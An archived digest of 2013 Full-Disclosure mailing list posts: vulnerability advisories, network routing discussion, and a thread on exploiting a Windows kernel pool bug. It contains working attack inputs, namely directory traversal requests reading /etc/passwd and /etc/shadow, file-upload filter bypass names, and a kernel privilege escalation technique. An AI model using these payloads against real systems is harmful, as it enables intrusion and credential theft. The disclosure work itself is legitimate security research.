gmane.comp.security.full-disclosure

Re: exploitation ideas under memory pressure

sd — 2013-05-21T03:14:32

Interesting idea to create a thread and patch the list. Upon reading your first post, I immediately thought this wasn't going to be exploitable, you've proven me wrong. Any chance for a copy of the exploit code? I might port it to Metasploit.

sd

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

CVE-2013-3496. Local privilege escalation vulnerability in Infotecs products (ViPNet Client\Coordinator, SafeDisk, Personal Firewall)

Максим Чудаков — 2013-05-21T06:37:10

CVE-2013-3496. Local privilege escalation vulnerability in Infotecs
products (ViPNet Client\Coordinator, SafeDisk, Personal Firewall)

CVE reference:
CVE-2013-3496

Credit:
Maksim Chudakov (< at >MChudakov)
Andrey Kurtasanov(andreykurtasanov< at >gmail.com)

Severity:
Medium

Local\Remote:
Local

Vulnerability Class:
Privilege Escalation

Vendor URL:
http://www.infotecs.biz/

Affected OS:
Windows

Vulnerable systems:
ViPNet Client 3.2.10 (15632) and prior
ViPNet Coordinator 3.2.10 (15632) and prior
ViPNet SafeDisk 4.1 (0.5643) and prior
VipNet Personal Firewall 3.1 and prior
Possibly same issues in other Infotecs products and other versions

Overview:
A local privilege escalation vulnerability exists in the Infotecs
products (ViPNet Client, SafeDisk, Personal Firewall and possibly
other products), which could be exploited by an attacker to execute
commands on the affected machine under the context of the SYSTEM user
or user with local administrative privileges.

Technical Background:
The vulnerability exists because I

Sony PS3 Firmware v4.31 - Code ExecutionVulnerability

Vulnerability Lab — 2013-05-20T23:32:57

Title:
======
Sony PS3 Firmware v4.31 - Code Execution Vulnerability


Date:
=====
2013-05-12


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=767


VL-ID:
=====
767


Common Vulnerability Scoring System:
====================================
6.5


Introduction:
=============
The PlayStation 3 is the third home video game console produced by Sony Computer Entertainment and the successor to the 
PlayStation 2 as part of the PlayStation series. The PlayStation 3 competes with Microsoft`s Xbox 360 and Nintendo`s Wii 
as part of the seventh generation of video game consoles. It was first released on November 11, 2006, in Japan, with 
international markets following shortly thereafter.

Major features of the console include its unified online gaming service, the PlayStation Network, its multimedia capabilities, 
connectivity with the PlayStation Portable, and its use of the Blu-ray Disc as its primary storage medium.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_3 )

Trend Micro DirectPass 1.5.0.1060 (Cloud) Software - Multiple Software Vulnerabilities

Vulnerability Lab — 2013-05-20T23:29:19

Title:
======
Trend Micro DirectPass 1.5.0.1060 (Cloud) Software - Multiple Software Vulnerabilities


Date:
=====
2013-05-21


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=894

Article: http://www.vulnerability-lab.com/dev/?p=580

Trend Micro (Reference): http://esupport.trendmicro.com/solution/en-US/1096805.aspx
Trend Micro Solution ID: 1096805

Video: http://www.vulnerability-lab.com/get_content.php?id=951


VL-ID:
=====
894


Common Vulnerability Scoring System:
====================================
6.1


Introduction:
=============
Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure location, so you only need to 
remember one password. Other features include: Keystroke encryption, secure password generation, automatic 
form-filling, confidential notes, and a secure browser.

Convenience - You can securely and easily manage passwords for numerous online accounts with just one 
password and automatically login to your websites with one click. Mo

Re: exploitation ideas under memory pressure

Tavis Ormandy — 2013-05-20T21:35:54

I guess I'm talking to myself, maybe this list is all about XSS now ;)

I'm quite proud of this list cycle trick, here's how to turn it into an
arbitrary write.

First, we create a watchdog thread that will patch the list atomically
when we're ready. This is needed because we can't exploit the bug while
HeavyAllocPool is failing, because of the early exit in pprFlattenRec:

.text:BFA122B8                 call newpathrec              ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong)
.text:BFA122BD                 cmp     eax, 1               ; Check for failure
.text:BFA122C0                 jz      short continue
.text:BFA122C2                 xor     eax, eax             ; Exit early
.text:BFA122C4                 jmp     early_exit

So we create a list node like this:

PathRecord->Next    = PathRecord;
PathRecord->Flags   = 0;

Then EPATHOBJ::bFlatten() spins forever doing nothing:

BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
{
    /* ... */

    for ( ppr = ppath->pprfirst; ppr; ppr = ppr->ppr

Re: My ISP is routing traffic to privateaddresses...

Patrick Webster — 2013-05-20T16:19:03

Maybe when we cut over to IPv6 the ISPs will revert to the golden age of
putting all their gear on publicly addressable space :)

Conversely, an enjoyable network design is where you route public IPs from
a private network to a private network, and the public IP has different
services on the internet to the internally routed version, but clients need
access to both.

NATing heaven.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Critical issues affecting multiple game engines

ReVuln — 2013-05-20T11:46:11

We have just released a paper [1], in which we detail several 0-day
issues affecting a number of different game engines, including: Unreal
Engine, CryEngine 3 and idTech 4.

During our presentation at the recent NoSuchCon conference in Paris, we
discussed [2] additional details about game engine issues. Additionally
we demonstrated [3] how an attacker can use master servers to perform
mass-exploiting of game vulnerabilities, in order to target and potentially
take down entire game networks.


[1] http://revuln.com/files/ReVuln_Game_Engines_0days_tale.pdf
[2] http://revuln.com/files/Ferrante_Auriemma_Exploiting_Game_Engines.pdf
[3] http://vimeo.com/66027238


---
ReVuln
http://revuln.com
http://twitter.com/revuln
http://revuln.com/revuln.asc


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: My ISP is routing traffic to privateaddresses...

Alexander Georgiev — 2013-05-20T10:00:53

Because private addresses have no global meaning, routing information
   about private networks shall not be propagated on inter-enterprise
   links, and packets with private source or destination addresses
   should not be forwarded across such links. Routers in networks not
   using private address space, especially those of Internet service
   providers, are expected to be configured to reject (filter out)
   routing information about private networks. If such a router receives
   such information the rejection shall not be treated as a routing
   protocol error.



Am 18. Mai 2013 14:55:08 schrieb Justin Elze <formulals1< at >gmail.com>:
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Defense in depth -- the Microsoft way

Stefan Kanthak — 2013-05-19T15:40:57

Hi < at >ll,

the "Microsoft Installer" creates for applications installed via an
.MSI the following uninstall information in the Windows registry
(see <http://msdn.microsoft.com/library/aa372105.aspx>):

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall]
"UninstallString"="MsiExec.Exe /X{<GUID>}"
"ModifyPath"="MsiExec.Exe /I{<GUID>}"

Note the unqualified path to the executable "msiexec.exe".

On Windows installations without the "SafeProcessSearchMode" hotfix
(cf. <http://support.microsoft.com/kb/905890>) or with this safeguard
turned off (cf. <http://msdn.microsoft.com/library/dd266735.aspx>,
which refers to <http://support.microsoft.com/kb/959426> alias MS09-015),
an executable "msiexec.exe" placed in the CWD or the users "base"
directory (addressed by "%HOMEDRIVE%%HOMEPATH%" and typically equal to
"%USERPROFILE%") can be run instead of the intended executable
"%SystemRoot%\System32\MsiExec.Exe".


The VERY simple fix (which eliminates this attack vector completely):
always use fully-qua

Thttpd 2.25b Directory Traversal Vulnerability

metropolis haxor — 2013-05-19T20:12:04

Hi guys,
You can find the software affected at http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz 
Thanks,
Metropolis
###########################################
#
# Software Name : Thttpd 2.25b
#
# Version :  2.25b (29dec2003)
#
# Bug Type : Directory Traversal Vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 19/05/2013
#
# Download app : http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz
#
#
###########################################
 
PoC :
 
127.0.0.1:80/../../../../../../../../etc/passwd


127.0.0.1:80/../../../../../../../../etc/shadow 
 

Example :
 
metropolis< at >Linuxbox ~ $ GET 127.0.0.1:80/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin

Interesting referrer URLs when accessing vulnerability disclosure information

halfdog — 2013-05-19T21:46:30

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello list,

In the aftermath of most of my full-disclosure posts I've observed
quite interesting referrer URLs when someone tries to read information
provided explaining the issue. In quite some cases, those requests can
be attributed to national CERTs, software distributors' security
teams, universities with IT-security research units, ... accessing
that information.

Information leaked via the referrer URLs indicates, that a noticeable
number of security experts do not exercise strict separation of their
internal working processes, e.g. accessing their internal
wiki/mantis/communication/... systems, from the context used for
accessing POC data. In rare cases even session IDs are encoded in the URL.

A malicious attacker could use the disclosure of e.g. an unrelated
zero day to compromise especially machines of CERT/DoD/.. or get at
least hints, who is interested in his material, e.g. by requests like

[Some-IP] - - [14/May/2013:17:44:38 +0000] "GET
/Security/

Revision of "IPv6 Stable Privacy Addresses" (Fwd:I-D Action: draft-ietf-6man-stable-privacy-addresses-07.txt)

Fernando Gont — 2013-05-19T18:05:00

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Folks,

We have published a revision of our IETF I-D "A method for Generating
Stable Privacy-Enhanced Addresses with IPv6 Stateless Address
Autoconfiguration (SLAAC)".

This revision is available at:
<http://tools.ietf.org/html/draft-ietf-6man-stable-privacy-addresses-07>.

This proposal is key for the mitigation of address-scanning attacks,
while at the same time preventing host-tracking.

Stay tuned for more IPv6 security news on our Twitter account:
< at >SI6Networks

Thanks!

Best regards,
Fernando Gont




- -------- Original Message --------
Subject: I-D Action: draft-ietf-6man-stable-privacy-addresses-07.txt
Date: Sun, 19 May 2013 10:06:30 -0700
From: internet-drafts< at >ietf.org
To: i-d-announce< at >ietf.org
CC: ipv6< at >ietf.org


A New Internet-Draft is available from the on-line Internet-Drafts
directories.
 This draft is a work item of the IPv6 Maintenance Working Group of the
IETF.

Title           : A method for Generating Stable Privacy-Enhanced
Addresses with IP

AFU vulnerabilities in MCImageManager for TinyMCE

MustLive — 2013-05-19T18:00:01

Hello list!

I want to warn you about vulnerabilities in Moxiecode Image Manager 
(MCImageManager). This is commercial plugin for TinyMCE. It concerns as 
MCImageManager, as all web applications which have MCImageManager in their 
bundle.

These are Arbitrary File Uploading vulnerabilities, which lead to Code 
Execution on IIS and Apache web servers.

-------------------------
Affected products:
-------------------------

Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.

-------------------------
Affected vendors:
-------------------------

Moxiecode
http://www.moxiecode.com

----------
Details:
----------

Arbitrary File Uploading (WASC-31):

http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html

Execution of arbitrary code is possible due to bypass of program's security 
filters (on IIS and Apache web servers).

Code will execute via file uploading. Program is vulnerable to two methods 
of code execution:

1. Via using of symbol ";" (1.asp;.txt) in file name (IIS).

2. Via d

AFU vulnerabilities in MCFileManager for TinyMCE

MustLive — 2013-05-18T20:45:44

Hello list!

I want to warn you about vulnerabilities in Moxiecode File Manager 
(MCFileManager). This is commercial plugin for TinyMCE. It concerns as 
MCFileManager, as all web applications which have MCFileManager in their 
bundle.

These are Arbitrary File Uploading vulnerabilities, which lead to Code 
Execution on IIS and Apache web servers.

-------------------------
Affected products:
-------------------------

Vulnerable are Moxiecode File Manager 3.1.5 and previous versions.

-------------------------
Affected vendors:
-------------------------

Moxiecode
http://www.moxiecode.com

----------
Details:
----------

Arbitrary File Uploading (WASC-31):

Execution of arbitrary code is possible due to bypass of program's security 
filters (on IIS and Apache web servers).

Code will execute via file uploading. Program is vulnerable to three methods 
of code execution:

1. Via using of symbol ";" (1.asp;.txt) in file name (IIS).

2. Via "1.asp" in folder name (IIS).

3. Via double extension (1.php.txt) (Apac

Re: My ISP is routing traffic to privateaddresses...

Justin Elze — 2013-05-18T12:55:08

The idea behind private IP space is it doesn't leave the ISPs AS via BGP to
the rest of the internet.

On the topic of routing if you're router doesn't have a directly connected
route or specific route for 172.x.x.x/whatever it will automatically send
information to the default 0.0.0.0 route.

There could be a number of cases where you had private IP space in front of
a router/wap/whatever.

ISPs use prefix lists on their boarder BGP routers to explicitly allow
which ranges get redistributed to the rest of the internet.


On Sat, May 18, 2013 at 7:41 AM, Kirils Solovjovs <
kirils.solovjovs< at >kirils.com> wrote:

Re: My ISP is routing traffic to privateaddresses...

Dan Dart — 2013-05-18T12:39:23

Virgin at least use the 172.16.x.x internally to their infrastructure
- and they suggest you use 192.168.x.x for your personal use.
Traceroutes to any "external" address outside of their network go
through a 172.16.x.x

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: My ISP is routing traffic to privateaddresses...

Kirils Solovjovs — 2013-05-18T11:41:00


On 2013.05.18. 10:34, Alexander Georgiev wrote:
It should. Private address ranges are not marked "magic cows" inside a 
classical router's firmware.

Still the problem OP is experiencing is strange, since if there is a 
local subnet, it should have a priority local route. Why isn't it there?

Btw, I'd be cautious to state that ISP filter incoming packets with 
dst=private. The limitation here would be that private ranges will 
usually be router upstream, so you can't really get past and internet 
exchange.

Re: My ISP is routing traffic to privateaddresses...

Alexander Georgiev — 2013-05-18T07:34:46

It is sad, that many people don't understand network basics. BTW, your 
internet router should not forward rfc1918 addresses to the outside, 
shouldn't he?



Am 18. Mai 2013 04:09:48 schrieb Gary Baribault <gary< at >baribault.net>:
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: My ISP is routing traffic to privateaddresses...

Gary Baribault — 2013-05-18T02:09:48

There is no reason for that, you can use the same address inside as
outside so long as you don't try and reach a 10.0.0.0/8 in their
network, and that should never happen. I have seen some networks where
the inside address range is 192.168.0.0/16 or /8 and the outside is as
well, so long as your trying to reach public ranges beyond the next
outside network it works just fine.

Gary Baribault
Courriel: gary< at >baribault.net
GPG Key: 0x685430d1
Fingerprint: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1

On 05/17/2013 04:40 PM, Carl "Thomas" Guething wrote:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: My ISP is routing traffic to privateaddresses...

Gary Baribault — 2013-05-18T02:07:22

If they use the 10.0.0.0/8 there's no harm, if they use a DOD range or
another 'public' routable range, there is definitely a risk.

Gary B

Gary Baribault
Courriel: gary< at >baribault.net
GPG Key: 0x685430d1
Fingerprint: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1

On 05/17/2013 03:22 PM, Julius Kivimäki wrote:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: exploitation ideas under memory pressure

Tavis Ormandy — 2013-05-18T00:44:58

Ahh, I just realised a really cute trick, we can make PATHREC->next
point to the same userspace PATHREC, and EPATHOBJ::bFlatten will spin
forever traversing an infinite linked list.

i.e.

PathRecord->next = PathRecord;

While it's spinning, another thread can clean up the pool, then patch
the listnode (because it's in userspace), to break into pprFlattenRec!
Turning this into a clean write-what-where should be trivial.

Anyone want to volunteer to write it up over the weekend? :)

Tavis.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/